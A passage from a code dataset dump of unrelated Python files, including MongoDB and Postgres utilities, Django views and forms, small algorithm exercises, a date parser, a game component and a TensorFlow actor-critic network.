for roi in roi_coll.find()}\n\n\ndef get_shape(name):\n return asShape(roi_coll.find_one({\"_id\": name.lower()})[\"geojson\"])\n\n\ndef get(name):\n return roi_coll.find_one({\"_id\": name.lower()})[\"geojson\"]\n\n\ndef insert_from_jsonfile(jsonfile):\n with open(jsonfile, encoding=\"utf-8\") as f:\n geojson = json.load(f)\n roi_coll.insert_many(geojson[\"features\"])\n\ndef savequickimage2local(url, localpath, try_num=10):\n if try_num > 0:\n try:\n urllib.request.urlretrieve(url, localpath + \".temp\")\n os.rename(localpath + \".temp\", localpath)\n return localpath\n except Exception:\n return savequickimage2local(url, localpath, try_num - 1)\n else:\n return None\n\ndef get_rsis_by_roi(roi_name):\n querydoc = {\n \"overlay\": {\n \"$geoIntersects\": {\n \"$geometry\": roi_coll.find_one({\"properties.Name\": roi_name})[\"geometry\"]\n }}}\n return [rsi[\"_id\"] for rsi in rsis_coll.find(querydoc)]\n\n\ndef update_roi_quickimages():\n roi_names = [roi[\"properties\"][\"Name\"] for roi in roi_coll.find()]\n for roi_name in roi_names:\n querydoc = {\n \"overlay\": {\n \"$geoIntersects\": {\n \"$geometry\": roi_coll.find_one({\"properties.Name\": roi_name})[\"geometry\"]\n }},\n \"localquickimage\": {\"$exists\": False}\n }\n rsis = [rsi for rsi in rsis_coll.find(querydoc)]\n count = 0\n print(roi_name, \"start\")\n for rsi in rsis:\n quickimagename = rsi[\"_id\"] + \".jpg\"\n quickimagepath = os.path.join(localdir, quickimagename)\n if not os.path.exists(quickimagepath):\n savequickimage2local(rsi[\"quickimage\"], quickimagepath)\n rsis_coll.find_one_and_update({\"_id\": rsi[\"_id\"]}, {\"$set\": {\"localquickimage\": quickimagepath}})\n count += 1\n print(count, \"of\", len(rsis), \"done\")\n print(roi_name, \"all quickimage updated\")\n\n# def update_roi_localquickimages():\n# for rsi in rsis_coll.find():\n# quickimagename = rsi[\"_id\"] + \".jpg\"\n# quickimagepath = os.path.join(localdir, quickimagename)\n# if os.path.exists(quickimagepath):\n# rsis_coll.find_one_and_update({\"_id\": rsi[\"_id\"]}, {\n# \"$set\": {\"localquickimage\": quickimagepath}})\n# print(\"all localquickimage update\")\n\n\nif __name__ == '__main__':\n update_roi_quickimages()","sub_path":"roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"107161233","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom .models import *\nimport os\nimport app.tell\n\n# Create your views here.\n\ndef index(request):\n if os.listdir('static/media/'):\n for img in os.listdir('static/media/'):\n if os.path.isfile('static/media/'+img):\n os.remove('static/media/'+img)\n for img in os.listdir('static/media/img/'):\n os.remove('static/media/img/' + img)\n for img in os.listdir('static/media/star/'):\n os.remove('static/media/star/' + img)\n for img in os.listdir('static/media/animal/'):\n os.remove('static/media/animal/' + img)\n return render(request, 'index.html')\n\ndef story(request):\n s = Stories.objects.all()\n context = {'s': s}\n return render(request, 'story/story.html', context=context)\n\ndef talk(request):\n name = request.POST.get('s')\n try:\n app.tell.robot(name)\n return redirect('/smart/index/')\n except Exception:\n return redirect('/smart/index/')\n","sub_path":"smart/taletelling/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"608873558","text":"import pandas as pd\n\npd.set_option('display.max_columns', 100)\npd.set_option('display.width', 1000)\n\necon_data = pd.read_csv('/Users/salma/Research/us-crime-analytics/data/econ_dec_90_15.csv')\n\n'''\n'ORI', 'AGENCY', 'CNTY' obtained from crime files since econ api data is merged right with crime data on state and\nplace fips to obtain these. So, under identity columns, only placename would have NaN values for the rows which don't\nhave economic data but had crime data\n'''\n\n#########\n# So we need to fill placename with any of the non missing place values in the group\necon_data['placename'] = econ_data.groupby('ORI')['placename'].apply(lambda x: x.ffill().bfill())\n\n#######\n# Now to fill all NaNs in numeric columns in a particular group with respective means\n\nnum_cols = ['pci_total_pop', 'pci_white', 'pci_black', 'emp_total_male', 'emp_total_female', 'emp_total',\n 'emp_total_male_white', 'emp_total_female_white', 'emp_total_male_black', 'emp_total_female_black',\n 'pci_hisp', 'emp_total_male_hisp', 'emp_total_female_hisp']\n\necon_data[[x for x in num_cols]] = econ_data.groupby('ORI', as_index=False)[num_cols]\\\n .transform(lambda x: x.fillna(x.mean()))\n\necon_data.to_csv('/Users/salma/Research/us-crime-analytics/data/econ_dec_90_15_missing_filled.csv', index=False)","sub_path":"utilities/economic_api_data_filler.py","file_name":"economic_api_data_filler.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"480001371","text":"from django import forms\n\nfrom byro.common.models import Configuration\n\n\nclass InitialForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.required = True\n\n class Meta:\n model = Configuration\n fields = (\"name\", \"backoffice_mail\", \"mail_from\")\n\n\nclass ConfigurationForm(forms.ModelForm):\n class Meta:\n model = Configuration\n fields = (\n \"name\",\n \"address\",\n \"url\",\n \"language\",\n \"currency\",\n \"mail_from\",\n \"liability_interval\",\n )\n","sub_path":"src/byro/common/forms/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"165694543","text":"import configparser\nconfig = None\nconfig_file = 'config.ini'\n\ndef get_config(section, reload=False):\n global config\n global config_file\n if config is None or reload:\n loc_config = configparser.ConfigParser()\n loc_config.read(config_file)\n config = loc_config\n return config[section]\n","sub_path":"lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"233904475","text":"import Zero\nimport Events\nimport Property\nimport VectorMath\nimport random\nVec3 = VectorMath.Vec3\n\nclass MouseLocationIndicator:\n Range = Property.Float(6.0)\n \n def Initialize(self, initializer):\n \n Zero.Connect(self.Space, Events.LogicUpdate, self.OnLogicUpdate)\n Zero.Connect(self.Space, Events.MouseUpdate, self.OnMouseUpdate)\n Zero.Connect(self.Space, Events.MouseUp, self.OnMouseUp)\n Zero.Connect(self.Space, Events.MouseDown, self.OnMouseDown)\n Zero.Connect(self.Space, Events.RightMouseUp, self.OnRightMouseUp)\n Zero.Connect(self.Space, Events.RightMouseDown, self.OnRightMouseDown)\n \n self.initial_size = self.Owner.Transform.Scale\n self.ball_size = self.Owner.SphereCollider.Radius\n \n self.hero = self.Space.FindObjectByName(\"Player\")\n self.Active = False\n self.TouchAttackable = False\n self.TouchGrowable = False\n self.WithInRange = False\n self.MousePos = Vec3(0,0,0)\n \n \n def OnLogicUpdate(self, UpdateEvent):\n self.UpdateEnvironmentInfo()\n if self.Active and self.WithInRange:\n self.PerformAbsorb()\n \n target_color = VectorMath.Vec4(1, 1, 1, 0.25)\n target_scale = 1\n if self.WithInRange:\n if self.TouchAttackable:\n target_color = VectorMath.Vec4(1, 0, 0, 0.25)\n target_scale = 5\n elif not self.TouchAnnihilator and self.TouchGrowable:\n target_color = VectorMath.Vec4(0, 1, 0, 0.25)\n target_scale = 5\n self.Owner.Sprite.Color = target_color\n self.Owner.Transform.Scale = self.initial_size * target_scale\n self.Owner.SphereCollider.Radius = self.ball_size / target_scale\n \n def PerformAbsorb(self):\n heroClickEvent = Zero.ScriptEvent()\n heroClickEvent.Target = self.hero\n self.Owner.Region.DispatchEvent(\"heroClickEvent\", heroClickEvent)\n \n def OnMouseUpdate(self, MouseUpdateEvent):\n self.MousePos = MouseUpdateEvent.ToWorldZPlane(0)\n self.Owner.Transform.Translation = self.MousePos\n \n def OnMouseDown(self, MouseDownEvent):\n self.Active = True\n \n def OnMouseUp(self, MouseUpEvent):\n self.Active = False\n \n def OnRightMouseDown(self, MouseDownEvent):\n if self.WithInRange and not self.TouchAnnihilator and self.TouchGrowable:\n self.hero.AbilityStatus.Perform(self.MousePos)\n \n def UpdateEnvironmentInfo(self):\n touched_objs = tuple(contactholder.OtherObject for contactholder in self.Owner.Collider.Contacts)\n self.TouchGrowable = any(tuple(obj.GrowableGround for obj in touched_objs))\n self.TouchAttackable = any(tuple(obj.ClickReceiver for obj in touched_objs))\n self.TouchAnnihilator = any(tuple(obj.PlantAnnihilator for obj in touched_objs))\n x2 = (self.MousePos.x - self.hero.Transform.Translation.x)**2\n y2 = (self.MousePos.y - self.hero.Transform.Translation.y)**2\n self.WithInRange = x2 + y2 < self.Range**2\n \n def OnRightMouseUp(self, MouseUpEvent):\n pass\n\nZero.RegisterComponent(\"MouseLocationIndicator\", MouseLocationIndicator)","sub_path":"prototypes/s_EngineProofDemo/Content/MouseLocationIndicator.py","file_name":"MouseLocationIndicator.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465441252","text":"import platform\nimport urllib.parse\nimport webbrowser\nfrom enum import Enum\n\nfrom .. import __api_version__, __version__\n\nGITHUB = 'https://github.com'\n\n\nclass Repositories(str, Enum):\n TINVEST = '/daxartio/tinvest'\n INVEST_OPENAPI = '/TinkoffCreditSystems/invest-openapi'\n\n\ndef create(repo: Repositories = Repositories.TINVEST):\n params = {\n 'body': (\n '## Expected Behavior\\n\\n\\n\\n'\n '## Actual Behavior\\n\\n\\n\\n'\n '## Steps to Reproduce the Problem\\n\\n'\n ' 1. \\n'\n ' 1. \\n'\n ' 1. \\n\\n'\n '## Specifications\\n\\n'\n f' - **[tinvest](/daxartio/tinvest/)** {__version__}\\n'\n ' - **[invest-openapi](/TinkoffCreditSystems/invest-openapi/)** '\n f'{__api_version__}\\n'\n f' - **platform** {platform.platform()}\\n'\n ),\n }\n\n query = urllib.parse.urlencode(params)\n url = f'{GITHUB}{repo}/issues/new?{query}'\n\n webbrowser.open(url, new=2)\n","sub_path":"tinvest/cli/issues.py","file_name":"issues.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380095137","text":"class Solution(object):\n \"\"\"docstring for Solution\"\"\"\n def maxDepth(self, root):\n if root is None:\n return 0\n maxLeft = self.maxDepth(root.left)\n maxRight = self.maxDepth(root.right)\n if maxRight > maxLeft:\n return (maxRight + 1)\n else:\n return (maxLeft + 1)\n","sub_path":"python/104MaximumDepthofBinaryTree.py","file_name":"104MaximumDepthofBinaryTree.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571835211","text":"# http://www.reddit.com/r/dailyprogrammer/comments/2lvgz6/20141110_challenge_188_easy_yyyymmdd/\n# Parse dates in a variety of formats, and return them in the iso 8601 standard format\n# (yyyy-mm-dd)\n\nimport re\n\ndef main(century=2000):\n\tpattern0 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{4})\t\t\t\t# yyyy\n\t\t-\t\t\t\t\t# -\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t-\t\t\t\t\t# -\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern1 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t/\t\t\t\t\t# /\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t/\t\t\t\t\t# /\n\t\t(\\d{2})\t\t\t\t# yy\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern2 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t\\#\t\t\t\t\t# #\n\t\t(\\d{2})\t\t\t\t# yy\n\t\t\\#\t\t\t\t\t# #\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern3 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t\\*\t\t\t\t\t# *\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t\\*\t\t\t\t\t# *\n\t\t(\\d{4})\t\t\t\t# yyyy\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern4 = re.compile(r\"\"\"\n\t\t^\n\t\t([a-z]{3})\t\t\t# mmm (3-letter month word, e.g. \"Jan\", \"Feb\" etc)\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t,\t\t\t\t\t# ,\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{2})\t\t\t\t# yy\n\t\t$\n\t\t\"\"\", re.VERBOSE | re.IGNORECASE)\n\tpattern5 = re.compile(r\"\"\"\n\t\t^\n\t\t([a-z]{3})\t\t\t# mmm (3-letter month word, e.g. \"Jan\", \"Feb\" etc)\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t,\t\t\t\t\t# ,\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{4})\t\t\t\t# yyyy\n\t\t$\n\t\t\"\"\", re.VERBOSE | re.IGNORECASE)\n\n\tmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\tpatterns = [pattern0, pattern1, pattern2, pattern3, pattern4, pattern5]\n\torders = [(0, 1, 2), (2, 0, 1), (1, 0, 2), (2, 1, 0), (2, 0, 1), (2, 0, 1)]\n\tformated_dates = []\n\n\twith open(\"188 dates.txt\") as f:\n\t\tfor line in f:\n\n\t\t\traw = line.strip()\n\t\t\tfor num, pat in enumerate(patterns):\n\t\t\t\tsearch = re.search(pat, raw)\n\t\t\t\tif search:\n# Reorder things to go year, month, day\n\t\t\t\t\tdate = [search.groups()[orders[num][i]] for i in range(3)]\n\t\t\t\t\tbreak\n# If year is 2 digits (e.g. 14) change to 4 digits (e.g. 2014). Also we do dates in range\n# (century-50, century+49) e.g. in range (1950, 2049)\n\t\t\tif len(date[0]) == 2:\n\t\t\t\tif int(date[0]) < 50:\n\t\t\t\t\tdate[0] = str(century + int(date[0]))\n\t\t\t\telse:\n\t\t\t\t\tdate[0] = str(century - 100 + int(date[0]))\n# If month is a three letter month (e.g. \"Jan\") then change it to a number (e.g. 0)\n\t\t\tif date[1] in months:\n\t\t\t\tdate[1] = str(months.index(date[1]))\n\t\t\t\tif len(date[1]) == 1:\n\t\t\t\t\tdate[1] = \"0\" + date[1]\n\t\t\tformated_dates.append(date)\n\n\treturn formated_dates\n\nif __name__ == \"__main__\":\n\tdates = main()\n\tfor d in sorted(dates):\n\t\tprint(\"-\".join(d))","sub_path":"Challenge #188/yyyy-mm-dd.py","file_name":"yyyy-mm-dd.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2705522","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on June 2021\n\nBAYESIAN HYPERPARAMETER OPTIMIZATION\n\n@author: Nuria Gómez-Vargas\n\"\"\"\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # INFO and WARNING messages are not printed\nos.chdir(r'C:\\Users\\CdeC\\Desktop\\AI iGENTAC - Nuria\\algoritmo_final')\n\nimport GPyOpt\nimport tensorflow as tf\n\nfrom siamese_network import SiameseNetwork\n\n\ndef main():\n\n def bayesian_optimization_function(x):\n\n dataset_path = r'C:\\Users\\CdeC\\Desktop\\AI iGENTAC - Nuria\\datasets'\n batch_size = 25\n \n load_dataset_again = True\n\n use_augmentation = True\n params_augmentation = {}\n if use_augmentation:\n params_augmentation['prob_aug'] = 0.50\n params_augmentation['by_channel'] = False\n params_augmentation['affine_scale'] = (1.05,1.2)\n params_augmentation['affine_trans'] = (0.001, 0.10)\n params_augmentation['sum'] = (1,50)\n params_augmentation['alpha_contrast'] = (1,2)\n params_augmentation['gauss_loc'] = (-30,30)\n params_augmentation['gauss_scale'] = (0,50)\n params_augmentation['times'] = 1\n \n current_learning_rate = float(x[:, 0])\n current_momentum = float(x[:, 1])\n current_std_prob_threshold = float(x[:, 2])\n current_input_shape = (int(x[:, 3]), int(x[:, 3]) + 50, 3)\n\n model_name = 'lr_' + str(current_learning_rate) + '__momentum_' + str(current_momentum) + \\\n '__std_prob_threshold_' + str(current_std_prob_threshold) + '__input_shape_' + str(current_input_shape)\n tensorboard_log_path = './logs/bho_nuevo_neval3/' + model_name\n \n siamese_network = SiameseNetwork(\n dataset_path = dataset_path,\n process = 'train',\n load_dataset_again = load_dataset_again,\n batch_size = batch_size,\n learning_rate = current_learning_rate,\n momentum = current_momentum,\n use_augmentation = use_augmentation,\n dict_augment = params_augmentation,\n input_shape = current_input_shape,\n tensorboard_log_path = tensorboard_log_path,\n std_prob_threshold = current_std_prob_threshold,\n model_name = model_name)\n\n print(\"Training model: \", model_name, \"\\n\")\n\n number_of_train_iterations = 1500\n validate_each = 250\n \n validation_accuracy = siamese_network.train_siamese_network(number_of_iterations = number_of_train_iterations,\n validate_each = validate_each,\n model_name = model_name)\n\n # Once trained and validated, we make the predictions over the evaluation (test) set\n\n # Load the weights of the net, which are the ones with best validation accuracy\n siamese_network.model.load_weights('./models/'+model_name+'.h5')\n \n evaluation_accuracy, _, _ = siamese_network.predict_after_train()\n print(\"Model: \" + model_name + ' | Accuracy: ' + str(evaluation_accuracy), \"\\n\")\n\n return 1 - evaluation_accuracy\n\n\n hyperparameters = [{'name': 'learning_rate', 'type': 'continuous', 'domain': (10e-5, 10e-2)},\n {'name': 'momentum', 'type': 'continuous', 'domain': (0.0, 1.0)},\n {'name': 'std_prob_threshold', 'type': 'discrete', 'domain': (0.05, 0.25)},\n {'name': 'input_shape', 'type': 'discrete', 'domain': (75,100,200)}]\n\n optimizer = GPyOpt.methods.BayesianOptimization(f = bayesian_optimization_function,\n domain = hyperparameters)\n\n max_iter_for_run_optimization = 100\n\n optimizer.run_optimization(max_iter = max_iter_for_run_optimization)\n\n print(\"optimized parameters: {0}\".format(optimizer.x_opt))\n print(\"optimized eval_accuracy: {0}\".format(1 - optimizer.fx_opt))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bayesian_hyperparameter_optimization.py","file_name":"bayesian_hyperparameter_optimization.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495809122","text":"class Solution:\r\n\r\n #Function to find the smallest positive number missing from the array.\r\n def missingNumber(self, arr, n):\r\n arr.sort()\r\n i = 1\r\n for j in range(n):\r\n if arr[j] == i:\r\n i += 1\r\n if arr[j] >= i:\r\n return i\r\n return i\r\n\r\n\r\n#{\r\n# Driver Code Starts\r\n#Initial Template for Python 3\r\n\r\nimport math\r\n\r\n\r\ndef main():\r\n T = int(input())\r\n while (T > 0):\r\n\r\n n = int(input())\r\n\r\n arr = [int(x) for x in input().strip().split()]\r\n\r\n ob = Solution()\r\n print(ob.missingNumber(arr, n))\r\n\r\n T -= 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n# } Driver Code Ends","sub_path":"Smallest_Positive_Missing_GFG.py","file_name":"Smallest_Positive_Missing_GFG.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"473800893","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\n\nconn = psycopg2.connect(dbname=\"\", user=\"hud_admin\", password=\"eRqg123EEkl\")\ncur = conn.cursor()\n\n# Get table mapping type_code and type_name\ncur.execute(\"SELECT oid, typname FROM pg_catalog.pg_type\")\ntype_mappings = {\n int(oid): typename\n for oid, typename in cur.fetchall()\n}\n\n# Get table names\ncur.execute(\"SELECT table_name FROM information_schema.tables WHERE table_schema='public'\")\ntable_names = cur.fetchall()\n\n# Get readable description of the tables\nreadable_description = {}\nfor table in table_names:\n statement = cur.mogrify(\"SELECT * FROM %s LIMIT 0\", (AsIs(table), ))\n cur.execute(statement)\n readable_description[table] = {\n \"columns\": [\n {\n \"name\": col.name,\n \"type\": type_mappings[col.type_code],\n \"internal_size\": col.internal_size\n }\n for col in cur.description\n ]\n }\n\n# Add row count\nfor table in readable_description.keys():\n cur.execute(\"SELECT COUNT(*) FROM %s\", (AsIs(table), ))\n row_count = cur.fetchone()\n readable_description[table][\"total\"] = row_count\n\n# Add sample rows\nfor table in readable_description.keys():\n cur.execute(\"SELECT * FROM %s LIMIT 100\", (AsIs(table), ))\n readable_description[table][\"sample_rows\"] = cur.fetchall()\n\nprint(readable_description)\n","sub_path":"description-table.py","file_name":"description-table.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"483142900","text":"\nnumber = input(\"Give me a whole number below 12 \")\n\nvalid = False\n\nwhile valid != True:\n try:\n number = int(number)\n valid = True\n except:\n number = input(\"Give me a whole number below 12 \")\n \nnumber2 = number\n \nwhile number2 <= number:\n print(str(number) + \"x\" + str(number2) + \"=\" + str(number * number2))\n number2 -= 1\n\n if number2 < 0:\n break\n\n \n","sub_path":"loops-try.py","file_name":"loops-try.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"90192202","text":"# !/usr/bin/env python\n# -*- coding utf-8-*-\n\n'''\nr,只能读。 【**】\nw,只能写,写之前清空。 【**】\na,只能追加。【*】\nr+ 读:默认从0的光标开始读,也可以通过 seek 调整光标的为位置。\n 写:从光标所在的位置开始写,也可以通过 seek 调整光标的位置。\nw+ 读:默认光标永远在写入的最后或0,也可以通过 seek 调整光标的位置。\n 写:先清空。\na+ 读:默认光标在最后,也可以通过 seek 调整光标的位置。然后再去读取。\n 写:永远写到最后。\n\n'''\n\n# 打开文件(r(写);w(重写);a(添加);r+(从光标位置开始写入);w+;a+)\nfile_object = open('log.txt', mode='r', encoding='utf-8')\n\n\n# 读取内容\ncontent = file_object.read()\nprint(content)\n\n# 关闭文件\nfile_object.close()","sub_path":"day07/文件操作.py","file_name":"文件操作.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"167505213","text":"def parse_current(self, response):\n # define selector that contains all items\n all_people = response.css(\"li.grid-listing__item\")\n print(all_people)\n # iterate through items\n for person in all_people:\n # manually parse name\n name = person.css(\"a>div>h2::text\").get()\n # manually parse title\n title = person.css(\"a>div>p::text\").get()\n\n now = datetime.datetime.now()\n year = now.year\n\n # Return item\n yield self.create_board(name,title,year)","sub_path":"ManWebScraper/AST/similarity/GSK/GSK_current.py","file_name":"GSK_current.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638443652","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport numpy as np\nimport vizdoomlearning as vl\n\nhelper = vl.Helper()\n\n\nclass ActorCriticNetwork:\n def __init__(self, screen_size, action_size, scope, trainer):\n with tf._variable_scope(scope):\n # Input and visual encoding layers\n\n self.inputs = tf.placeholder(shape=[None, screen_size], dtype=tf.float32)\n self.image_input = tf.reshape(self.inputs, shape=[-1, 84, 84, 1])\n self.conv1 = slim.conv2d(self.image_input,\n num_outputs=16,\n kernel_size=[8, 8],\n stride=[4, 4],\n padding='VALID',\n activation_fn=tf.nn.elu)\n self.conv2 = slim.conv2d(self.conv1,\n num_outputs=32,\n kernel_size=[4, 4],\n stride=[2, 2],\n padding='VALID',\n activation_fn=tf.nn.elu)\n hidden_layer = slim.fully_connected(slim.flatten(\n self.conv2),\n 256,\n activation_fn=tf.nn.elu)\n\n # Recurrent network for temporal dependencies\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)\n c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)\n h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)\n self.init_state = [c_init, h_init]\n c_input = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])\n h_input = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])\n self.state_input = (c_input, h_input)\n rnn_input = tf.expand_dims(hidden_layer, [0])\n step_size = tf.shape(self.image_input)[:1]\n lstm_state_input = tf.contrib.rnn.LSTMStateTuple(c_input, h_input)\n lstm_output, lstm_state = tf.nn.dynamic_rnn(lstm_cell,\n rnn_input,\n sequence_length=step_size,\n initial_state=lstm_state_input,\n time_major=False)\n lstm_c, lstm_h = lstm_state\n self.state_output = (lstm_c[:1, :], lstm_h[:1, :])\n rnn_output = tf.reshape(lstm_output, [-1, 256])\n\n #Output layers for policy and value estimations\n self.policy = slim.fully_connected(rnn_output,\n action_size,\n activation_fn=tf.nn.softmax,\n weights_initializer=helper.normalized_columns_initializer(0.01),\n biases_initializer=None)","sub_path":"python/neuralnetwork/vizdoomlearning/ActorCriticNetwork.py","file_name":"ActorCriticNetwork.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649197658","text":"#問16 整列によって元のデータがどこに移ったか求める\n\ndef simplesort(a):\n #インデックスの配列を作る\n index = [i for i in range(len(a))]\n for i in range(len(a)):\n min = i\n for j in range(i+1,len(a)):\n if a[j] < a[min]:\n min = j\n a[i],a[min] = a[min],a[i]\n #aの要素を入れ替えると同時に,index配列の要素も入れ替える\n index[i],index[min] = index[min], index[i]\n return index\n\n#資料の例で確かめる\ndef test():\n a = [2,2,1,1]\n print(simplesort(a) == [2,3,0,1])\n\ntest()\n","sub_path":"第三回/Q16.py","file_name":"Q16.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601549445","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom math import ceil\nfrom collections import OrderedDict\n\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.template.context import RequestContext\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.safestring import mark_safe\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.models import User\nfrom django.forms.widgets import RadioFieldRenderer\nfrom django.utils import timezone\n\nfrom primus.base.views import BaseListView, check_categories_url\nfrom primus.base.fields import NoRenderInput\nfrom primus.base.templatetags import calc\n\nfrom primus_payment.forms import BasePayableOrderForm\n\nfrom shop.models import *\nfrom shop.iqsms import IQSMS\n\n\nclass MinMaxWidget(forms.MultiWidget):\n def __init__(self, *args, **kwargs):\n widgets = (forms.TextInput, forms.TextInput)\n super(MinMaxWidget, self).__init__(widgets, *args, **kwargs)\n for w in self.widgets:\n w.attrs['size'] = 7\n\n def render(self, *args, **kwargs):\n return mark_safe(u'

    %s

    ' % (super(MinMaxWidget, self).render(*args, **kwargs), int(self.limits[0] or 0), int(self.limits[1] or 100)))\n\n def format_output(self, widgets):\n # FIXME: use labels\n return u'от %s до %s' % (widgets[0], widgets[1])\n\nclass MinMaxField(forms.MultiValueField):\n def compress(self, dl):\n return dl\n \n def __init__(self, limits, *args, **kwargs):\n fields = (forms.IntegerField(min_value=0, required=False), forms.IntegerField(min_value=0, required=False))\n super(MinMaxField, self).__init__(fields, widget=MinMaxWidget, *args, **kwargs)\n self.widget.limits = limits\n\n def clean_(self, value):\n value = super(MinMaxField, self).clean(value)\n try:\n if int(value[0]) > int(value[1]):\n raise forms.ValidationError(_(u'Минимальный предел больше максимального'))\n except ValueError:\n pass\n return value\n\nclass FilterForm(forms.Form):\n text = forms.CharField(required=False, label=_(u'Поиск по названию'))\n\n def __init__(self, cat, items, *args, **kwargs):\n if 'label_suffix' not in kwargs:\n kwargs['label_suffix'] = ''\n self.cat = cat\n self.items = items\n price_limits = items.aggregate(vmin=models.Min('price'), vmax=models.Max('price'))\n \n super(FilterForm, self).__init__(*args, **kwargs)\n\n self.fields = OrderedDict(\n self.fields.items()[:1]\n + [('price', MinMaxField(limits=(price_limits['vmin'], price_limits['vmax']), label=_(u'Цена'), required=False))]\n + self.fields.items()[1:]\n )\n\n def filter_items(self):\n kwargs = {}\n if self.cleaned_data.get('price'):\n pmin, pmax = self.cleaned_data['price']\n if pmin:\n kwargs['price__gte'] = pmin \n if pmax:\n kwargs['price__lte'] = pmax \n\n # search by text\n if self.cleaned_data.get('text'):\n found_ids = {}\n for word in re_split_words.findall(self.cleaned_data.get('text', '').lower()):\n results = SearchWord.objects.filter(key=word)\n if results:\n found_ids[word] = set(reduce(lambda x,y: x+y, map(lambda x:x.values.split('|'), results)))\n\n if found_ids.values():\n ids = reduce(lambda x,y:x.intersection(y), found_ids.values())\n kwargs['id__in'] = ids\n else:\n self.items = self.items.none()\n return self.items.filter(**kwargs)\n\n\nclass HTMLRadioInput(forms.RadioSelect):\n def __unicode__(self):\n from django.utils.encoding import force_unicode\n if 'id' in self.attrs:\n label_for = ' for=\"%s_%s\"' % (self.attrs['id'], self.index)\n else:\n label_for = ''\n choice_label = force_unicode(self.choice_label)\n return mark_safe(u'%s %s' % (label_for, self.tag(), choice_label))\n\n\nclass HTMLRadioFieldRenderer(RadioFieldRenderer):\n def __iter__(self):\n for i, choice in enumerate(self.choices):\n yield HTMLRadioInput(self.name, self.value, 